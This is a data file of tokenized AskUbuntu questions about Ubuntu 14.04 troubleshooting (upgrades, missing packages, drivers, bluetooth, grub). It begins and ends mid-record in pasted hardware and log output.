1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 memory:9fb00000-9fbfffff ioport : b3400000 ( size=1048576 ) *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 20:89:84:77:44:5c capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.134 firmware=sb latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : b3430000-b343ffff memory : b3440000-b344ffff memory : b3450000-b34507ff *-generic:0 description : sd host controller product : bcm57765/57785 sdxc/mmc card reader vendor : broadcom corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=sdhci-pci latency=0 resources : irq:17 memory : b3400000-b340ffff *-generic:1 unclaimed description : system peripheral product : bcm57765/57785 ms card reader vendor : broadcom corporation physical id : 0.2 bus info : pci @ 0000:02:00.2 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b3410000-b341ffff *-generic:2 unclaimed description : system peripheral product : bcm57765/57785 xd-picture card reader vendor : broadcom corporation physical id : 0.3 bus info : pci @ 0000:02:00.3 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b3420000-b342ffff *-pci:2 description : pci bridge product : 7 series/c210 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 memory : b3500000-b35fffff ioport:9fc00000 ( size=1048576 ) *-network description : wireless interface product : ar9462 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : bc:85:56:12:98:27 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a ip=192.168.1.4 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:17 memory : b3500000-b357ffff memory:9fc00000-9fc0ffff *-usb:2 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : b3618000-b36183ff *-isa description : isa bridge product : hm77 express chipset lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 7 series chipset family 6-port sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:42 ioport:3088 ( size=8 ) ioport:3094 ( size=4 ) ioport:3080 ( size=8 ) ioport:3090 ( size=4 ) ioport:3060 ( size=32 ) memory : b3617000-b36177ff *-serial unclaimed description : smbus product : 7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : b3615000-b36150ff ioport:3040 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : st500lt012-9ws14 vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0001 serial : w0v9p461 size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=4096 signature=0003c053 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : bc6f51c5-7821-416c-bdd8-53535a21329f size : 461gib capacity : 461gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink extents ext4 ext2 initialized configuration : created=2014-04-10 03:18:11 filesystem=ext4 lastmountpoint=/ modified=2014-04-19 17:08:49 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-04-19 17:08:50 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 3985mib capacity : 3985mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 3985mib capabilities : nofs *-scsi:1 physical id : 2 logical name : scsi2 capabilities : emulated *-cdrom description : dvd-ram writer product : dvdram gt90n vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc varlog files so you can have a look at the crash errors : apr 19 17:31:31 acer rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 7.4.4 '' x-pid= '' 643 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped apr 19 17:32:05 acer anacron [ 960 ] : jobcron.daily ' terminated apr 19 17:32:05 acer anacron [ 960 ] : job cron.weekly ' started apr 19 17:32:05 acer anacron [ 7327 ] : updated timestamp for jobcron.weekly ' to 2014-04-19 apr 19 17:33:47 acer anacron [ 960 ] : job cron.weekly ' terminated apr 19 17:33:47 acer anacron [ 960 ] : normal exit ( 2 jobs run ) apr 19 17:33:57 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 17:34:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 17:34:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 17:38:57 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 17:39:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 17:40:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 17:43:57 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 17:44:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 17:44:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 17:48:57 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 17:49:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 17:50:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 17:53:57 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 17:54:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 17:54:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 17:58:58 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 17:59:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:00:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:00:12 acer networkmanager [ 773 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted apr 19 18:00:19 acer wpa_supplicant [ 790 ] : wlan0 : wpa : group rekeying completed with 00:1e : a6:0a:83 : e4 [ gtk=tkip ] apr 19 18:02:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:03:58 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:04:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:04:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:08:58 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:09:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:10:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:11:15 acer kernel : [ 3761.314827 ] perf samples too long ( 2501 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 apr 19 18:13:58 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:14:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:14:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:17:01 acer cron [ 7838 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) apr 19 18:18:58 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:19:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:20:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:23:58 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:24:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:24:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:28:58 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:29:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:30:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:33:58 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:34:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:34:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:35:08 acer kernel : [ 5193.708912 ] chrome [ 2396 ] : segfault at ffffffff ip b58baac8 sp bfcd0ef0 error 5 in chrome [ b2c83000+4af1000 ] apr 19 18:38:58 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:39:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:40:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:43:58 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:44:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:44:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:48:58 acer wpa_supplicant [ 790 ] : message repeated 3 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:49:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:50:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:50:45 acer kernel : [ 6130.398244 ] chrome [ 8000 ] : segfault at ffffff9c ip b58d3ac8 sp bfdf8db0 error 5 in chrome [ b2c9c000+4af1000 ] apr 19 18:53:58 acer wpa_supplicant [ 790 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 19 18:54:01 acer wpa_supplicant [ 790 ] : wlan0 : sme : failed to send 20/40 bss coexistence frame apr 19 18:54:09 acer wpa_supplicant [ 790 ] : wlan0 : ctrl-event-scan-started apr 19 18:57:50 acer dbus [ 700 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) apr 19 18:57:50 acer dbus [ 700 ] : [ system ] successfully activated service 'org.freedesktop.systemd1' apr 19 17:31:31 acer rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 7.4.4 '' x-pid= '' 643 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped apr 19 18:57:50 acer rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 7.4.4 '' x-pid= '' 643 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 .
453452	how to solve missing libmng.so.1 in trusty ( 14.04 ) package is no more available	i would like to run soulseekqt . however unfortunately one of the dependencies is libmng1 , which is no more included in trusty . sudo apt-get install libmng.so.1 or libmng1 or libmng1 : i386 in trusty ( 14.04 ) no more available . do you have any idea how to solve this conflict ? i mean is it really sure that libmng1 is excluded ? could i use libmng2 somehow instead ? if not , could i somehow rebuild libmng1 for trusty ? or do i have to downgrade back to saucy ( 13.10 ) ?
453453	is any offline upgrade from 13.10 to 14.04 possible ?	i typically upgrade downloading the relevant iso ( not necessarily the alternate one ) , going offline and then running : sudo mount -o loop ubuntu-11.04-alternate-amd64.iso /media/cdrom gksu /media/cdrom/cdromupgrade ... and then connecting and doing an update once the system is installed . i do this for stability and so i can schedule the upgrade and update independently ( i.e . juggling time and bandwidth ) . however , the trusty tahr release notes say : offline upgrade options via alternate cds are no longer offered for ubuntu desktop and ubuntu server . please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above . does this mean that an offline upgrade is impossible , even with the non-alternate iso ? if it is impossible , can i still do the upgrade via a mounted iso , or is a usb/dvd now required ?
453455	unable to upgrade ubuntu from 13.10 to 14.04	everything is working fine , until : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-3.13.0-24_3.13.0-24.46_all.deb connection failed [ ip : 91.189.91.14 80 ] but with wget i can download the file without any problems .
453456	how to install secure svn server without apache ?	i would like to install a secure svn server without the need to use tomcat or any other java server . is it even possible ? in any case no web access is needed . if yes can you please provide a brief step by step answer because i am quite new to linux/ubuntu .
453460	is avant window navigator available for ubuntu 14.04 ?	i want to install avant-window-navigator on ubuntu 14.04 . i tried to install by following command : sudo add-apt-repository ppa : awn-testing/ppa sudo apt-get update sudo apt-get install avant-window-navigator but sudo apt-get update getting error : w : failed to fetch http : //ppa.launchpad.net/awn-testing/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found and sudo apt-get install avant-window-navigator getting error : e : unable to locate package avant-window-navigator so , is awn available for 14.04 on any new ppa ? or should i avoid installing avant-window-navigator ?
453468	install apache , php and mysql on different servers	i have deployed a cloud using openstack and have vms running in the cloud and i am also able to ping/ssh between those vms . i want to install apache , php , and mysql on three different nodes ( as i mentioned that i can ssh between those nodes/vms ) . is there any guide how to do this ? or where do i have to change the conf files to make this working together ?
453470	why do ubuntu amis only have 8gig on root	i 've created an ec2 instance from an ubuntu ami but the instance storage is split , with 8gig on the root and the rest mounted at /mnt why is this ? how do i get it all mounted on the root ?
453471	permission denied ( publickey , password ) : how to remove a password from an embedded device	i am trying to connect to an embedded device of mine through ssh . it 's a fox g20 v board . but i am having a hard time connecting because it always asks me for a password ( it did n't used to before ) . and this password is n't a private/public key because i 've removed that option . i 've checked their site and tried the password they propse here but it does n't seem to work . therefore , does anyone know how i can remove the fact that the board asks me for a password ? is there a reformating stage i can perform or something ? i 'm using a linux os on my machine .
453474	how to run a software from other drives rather than the root ?	i downloaded the blender software from its official site and i read the installation procedure . it stated that blender can be run from any drives/partition on ubuntu and all we must do is extract to the desired location . but blender only runs on the root directory folder ( /home for example ) . and i need it to run on my d drive where i have all my blend files from windows . so is there any way to run blender on any of my partitions ?
453475	chromium display is remanent since 14.04 upgrade with gpu acceleration enabled	since i updated ubuntu to 14.04 , i have some issue with chromium , the display is remanent when switching virtual desktop or appear when the application is minimized . i found that the issue is gpu-related since when i start the browser with -- disable-gpu i have not the issue . i do n't know if this issue is related to chromium new version , nvidia driver version or other thing since each of those package where upgraded during distribution upgrade ... ii chromium-browser 34.0.1847.116-0ubuntu2 amd64 chromium browser ii nvidia-304 304.117-0ubuntu1 amd64 nvidia legacy binary driver - version 304.117 if someone have this kind of issue and know a workaround or something to try ...
453478	how to turn off mail notification blue envelope ?	i was wondering how to turn off the blue envelope notification in ubuntu 14.04 it lights up perfectly , but it never turns off again . i need to manually delete notifications . even if i have read the email from evolution , this is a flaw in the notification system .
453479	how to disable shutdown/reboot from lightdm in 14.04 ?	in 12.04 it was possible to prevent system shutdown or reboot from the login screen by adding the following restrictions in /etc/polkit-1/localauthority/50-local.d ( adapted from here ) : [ disable lightdm powermgmt ] identity=unix-user : lightdm action=org.freedesktop.consolekit.system.restart ; org.freedesktop.consolekit.system.stop resultany=no resultinactive=no resultactive=no with 14.04 , this rule seems to have no effect anymore . any advice how to implement the restriction ?
453482	( update to 14.04 ) unity is not loading after i login to the admin profile after upgrade	after upgrading to 14.04 and after the final reboot , i logged in the admin account but unity wo n't start , i have only the 14.04 background . no shortcuts work . i can login and use the guest and other accounts on the machine . i think i might have opted to keep one of the settings that i was asked to select during the upgrade to 14.04 . what other info can i provide ? my chipset is intel gm45 mobile . why does unity on the other accounts ( guest , etc ) login and work normally ? i have only been using ubuntu since 13.04 , so im not that familiar with it . my setup is dual boot with windows 7 on a laptop . can someone help ?
453485	when should i use apt-get and aptitude or apt-fast ?	is there any difference between installing by apt-get , apt-fast and aptitude ? which is recommended to use while installing and removing package ? in other words , which command is preferable while managing packages ? is it true that aptitude is more user-friendly than apt-get ? for gui tools gdebi and synaptic are often used . is it better to use a cli tool for package-management ?
453488	printer indicator missing in ubuntu 14.04	since updating to ubuntu 14.04 when i print a document the printer indicator does n't show in the top toolbar . how do i get it back ?
453490	`` could not get screen information '' error	i have ubuntu 13.10 32bit os . a few days ago i added gnome3 ppa and upgraded to gtk 3.10 . i had to fix many gnome bugs . but i could n't find a solution to this one . when i try to open display lc_all=c gnome-control-center display i get could not get screen information error . i do n't know it 's related to it ; i can not generate xorg.conf with sudo xorg :1 -configure i get sudo xorg :1 -configure x.org x server 1.14.5 release date : 2013-12-12 x protocol version 11 , revision 0 build operating system : linux 3.2.0-54-generic i686 ubuntu current operating system : linux kenn 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:32 utc 2014 i686 kernel command line : boot_image=/boot/vmlinuz-3.11.0-19-generic root=uuid=c2d1b866-a0fd-4214-b79b-11b2af29da4d ro quiet splash vt.handoff=7 build date : 17 december 2013 10:03:52am xorg-server 2:1.14.5-1ubuntu2~saucy1 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.1.log '' , time : wed apr 23 12:08:43 2014 setversion 1.4 failed list of video drivers : sis r128 neomagic vmware modesetting openchrome trident dummy ati mach64 siliconmotion mga radeon s3 cirrus vesa sisusb qxl tdfx intel nouveau savage fbdev ( ++ ) using config file : `` /home/****/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' vesa : ignoring device with a bound kernel driver number of created screens does not match number of detected devices . configuration failed . ( ee ) server terminated with error ( 2 ) . closing log file . here is my driver info lspci -nn | grep -i vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) [ 8086:2a02 ] ( rev 03 ) i hope you help me fix it .
453493	unable to install vlc	this is what happens : sudo apt-get install vlc reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vlc please help . i would also like to know when this error occurs , i 've seen it before too .
453495	xubuntu 14.04 clock laptop	i installed xubuntu 14.04 on a toshiba nb520 laptop and used vienna as time zone . now the clock on the panel always shows a time which is two hours too early . but in properties the time is displayed correctly . it seems to be impossible to get the clock to display the time , which is entered in properties . what to do about it ?
453502	bluetooth keyboard layout doesnt load at startup	i have a problem with the keymapper in ubuntu . i have two keyboards setup , one is using the standard keyboard input ( no idea how you call this keyboard input , it 's the purple , circular , standard input that has been around for as long as i remember computers ) , the other one is a french bluetooth logitech mx5000 keyboard , running over a bluetooth dongle . both keyboards work great . when ubuntu has started up , i first need to press some keys on my standard keyboard , before the keymapper kicks in , and the bluetooth keyboard is outputting the correct keys . if i do n't press some keys on the old keyboard first , everything i type on the bluetooth keyboard , is still in the default us keymap ( eg . i press 'q ' , and i see 'a ' on the screen , etc ) . how do i change this ? it 's particularly annoying when i need to enter the password at login , and i cant remove the old keyboard since i need it to trigger 'some ' keymapper loading ...
453506	ubuntu requirements	a notebook sony vaio with the following requirements cpu intel core 2 duo t5500 1.66ghz memory 2gb ddr2 sdram ( 533mhz ) hdd 320gb screen 15.4 '' wxga ( 1280x800 ) graphics nvidia geforce go 7400 ( suporting 256mb ) supports ubuntu 14.04 lts ?
453507	convert .jar to executable	my project is to develope an installer which is an executable for all three platforms windows , mac and ubuntu.as you know the executables on windows , mac and ubuntu are .exe , .app and .deb respectively . so , i converted my .jar file to a .exe file on windows using a software called launch4j . and on mac i used a software called jar-bundler to convert my jar in to .app file . i want to know is there any specific software on ubuntu to convert my jar file in to a .deb file .
453509	window control does n't work corectly on ubuntu 14.04 lts	even if i select `` right allign `` on window control inside unity tweak tool it does n't work , and command controls remain only on the left side , even when i check the checkbox below `` show menu button ``
453511	samba file sharing is not working	i have done all configurations for file sharing from ubuntu to windows by http : //www.7tutorials.com/how-change-workgroup-ubuntu-linux-work-windows this link . now i am unable to access the ubuntu shared folder in windows . i am getting access denied error .
453512	how to install jupiter on ubuntu 14.04 lts ?	i have made some research how to install jupiter on ubuntu 14.04 : in therory : download the program ( noarch.rpm ) from sourceforge convert .rpm into .deb , by using alien program ; add missing jupiter group to ubuntu ; install recently converted deb package ; in practic : sudo apt-get install alien sudo groupadd jupiter cd ~/downloads sudo alien -k jupiter-0.1.11-1.noarch.rpm -- scripts sudo dpkg -i jupiter_0.1.11-1_all.deb ... in general , it works ( it appears in ps aux | grep jupiter list ) , but there is still missing jupiter indicator . someone knows how to get this done to work properly ?
453515	skype/14.04 : no sound output in conversations	i installed skype 4.2 via ppa on my fresh 14.04 system . skype itself makes notification sounds ( though distorted ) , but when i am in a conversation , i receive neither sound , nor video . i tested it with my mom , she could hear and see me , but i could n't see or hear her , and the sound test is quiet too . i did n't install any additional drivers yet , as i 'm much of a newbie i 'm not sure which ones to choose . please let me know if you need any command outputs .
453516	in connect to server , there is no server type option in ubuntu 14.04	i want to mount my box.com webdav into my ubuntu 14.04 , but when i clicked the “connect to server” option in my home folder , i guess there is supposed to be an option for the type of server i want to connect to , as there was on previous versions . where is that option now ?
453517	trouble installing grub on ubuntu 14.04	i recently dual booted my windows 8.1 system ( hp-pavilion-g6-notebook-pc ) to ubuntu 14.04 . according to the instructions on a question asked regarding grub installation , i installed `` boot repair '' clicked on `` recommended repair '' after that i followed the following directives mention by the software , sequentially . please open the terminal and type the following commands sudo dpkg -- configure -a sudo apt-get install -fy sudo apt-get purge -y -- force-yes grub* shim-signed linux-signed* sudo apt-get install -y -- force-yes grub-efi-amd64-signed shim-signed linux-signed-generic you can now reboot your computer . the boot files of [ the os now in use - ubuntu 14.04 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) it also generated a long text file , along with the error message . what should i do ?
453524	how to set nautilus width and height when running from command-line	is it possible to set size of the window when running the program from terminal ? for example i want to open current directory in nautilus : sylap @ sylap : ~/desktop/omg/wtf/foo/bar nautilus . but i want it to be opened with fixed size , ie , i want to do something like this : sylap @ sylap : ~/desktop/omg/wtf/foo/bar winwidth=400 winheight=500 nautilus .
453525	ca n't install glibc-2.19	several times i tried to install the library glibc-2.19 , but it always ended in an error . i followed the installation instructions but it did n't work . i 'm trying to install glibc-2.19 on ubuntu 13.10 , 32 bit .
453527	lag spikes when playing games since upgrade to 14.04 from 12.04	i sometimes play games ( awesomenauts , cs : go , ... ) on my ubuntu 14.04 laptop . after upgrading from 12.04 to 14.04 last week the gameplay of all of my internet games suffers from lags every view minutes . the lags seem to apply only to my upstream ( 10:1 mbit [ down : up ] ) since i can see other players move without lag but my character is stuck or moved back to previous position . the ping increases up to 500ms . the cpu runs smoothly without spikes . any idea what the problem might be ? any hint on how i can find out if there is a software in 14.04 jamming my upstream ?
453528	not showing terminal in failsafe mode	pressing alt ctrl f1 does n't open the terminal when i 'm trying to boot from my hard drive . there 's just this black screen . when i do it from a liveusb the terminal opens but executing the commands show am error of ca n't locate package . please help .
453529	gnome desktop flickers on one monitor	recently , i 've run into a strange problem with ubuntu gnome . i installed 14.04 last saturday and everything was fine . however , i woke up one morning to find my asus hdmi monitor saying `` vga no signal . '' this did n't make any sense , since i never changed its display settings . i ended up changing it back to hdmi using its hardware buttons . however , my trouble did n't end there . now , every time i move windows ( even minimizing ) on that specific monitor ( i have two monitors ) , the desktop in the background will flicker with images of every frame when the window moved . this does not occur on my other display , and did not occur on install . i never changed my graphics drivers , either . i tried disabling and re-enabling the monitor from the settings manager , but it was not fixed . does anyone have a solution to my problem . this seems specific to ubuntu , since the flickering only happens on the desktop , i just ca n't figure out why .
453539	problems with compiz on ubuntu 14.04 lts	i am currently dual booting ubuntu 14.04 lts on my system ( 3 gb ram , i3 , 320 gb hdd ) . i recently installed the compiz config manager along with compiz pluginz . realizing that they would not be much useful ( and the fact that my system was behaving weird 10 mins into the installation ) i uninstalled compiz pluginz . as a result however , i am unable to boot in ubuntu . i get past the login screen after which only my wallpaper is visible ( i.e no dash , panel etc . ) which renders ubuntu quite useless . what should i do to rectify this situation ?
453541	ubuntu 13.10 ram ?	does ubuntu 13.10 work well with an acer aspire one d255-2dqkk intel atom-n450 with 1gb of ram ? i tried it via the installation in an usb and by booting my pc with it and it seems working well ... but i want some opinions ...
453548	ubuntu server : how to pipe / scroll through search results of a certain command	this is perhaps a really simple thing to do , however , after looking on the internet i can not find the fast answer anywhere . suppose that i have this ubuntu server running in a really small virtualbox . when i use a command i sometimes can only see a small part of the results . what should i add after command to make me able to scroll through the results page by page ?
453549	is there support for screen rotation and keyboard/trackpad lock on a yoga 11s in ubuntu 14.04 ?	i recently installed ubuntu 14.04 on my lenovo yoga 11s . i was wondering if anyone knows if there is/will be support for tablet mode ( i.e . screen rotation and input lock for the keyboard and track pad ) ? thanks for any support
453552	gallery2 package deleted from 14.04 ?	i upgraded from 13.10 to 14.04 yesterday and it broke my gallery2 install . upon further research , i see that the package was deleted from trusty ubuntuupdates.org search but i ca n't seem to find out why . is there some place where such decisions and reasonings are recorded ? was it an oversight ?
453553	killer n 1202 bluetooth stopped working	i have a problem with my bluetooth adapter in ubuntu 14.04 . everything worked fine yesterday evening , but this morning it tells me `` no bluetooth adapters found '' . wifi still works fine . if that helps , in the meantime i booted on win8 but did n't use bluetooth . i 've tried everything i could find in the last few hours ( updated win8 drivers , installed blueman ... ) . i checked and no udates/packages were installed since yesterday evening . if that helps here is what i get with various commands : theom @ theom-laptop : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no theom @ theom-laptop : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' fritz ! box fon wlan as '' mode : managed frequency:5.18 ghz access point : c0:25:06 : c4:04 : d1 bit rate=240 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=62/70 signal level=-48 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:137 missed beacon:0 theom @ theom-laptop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:90 : f5 : ef:2b : ef up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1274 errors:0 dropped:0 overruns:0 frame:0 tx packets:1274 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:129085 ( 129.0 kb ) tx bytes:129085 ( 129.0 kb ) wlan0 link encap : ethernet hwaddr 80:56 : f2 : a5:79:2b inet addr:192.168.178.58 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fd00 : :f0ea:7774 : b8:631f/64 scope : global inet6 addr : fd00 : :8256 : f2ff : fea5:792b/64 scope : global inet6 addr : fe80 : :8256 : f2ff : fea5:792b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:19505 errors:0 dropped:0 overruns:0 frame:0 tx packets:11904 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:13889260 ( 13.8 mb ) tx bytes:1585430 ( 1.5 mb ) theom @ theom-laptop : ~ $ sudo lshw -c network *-network 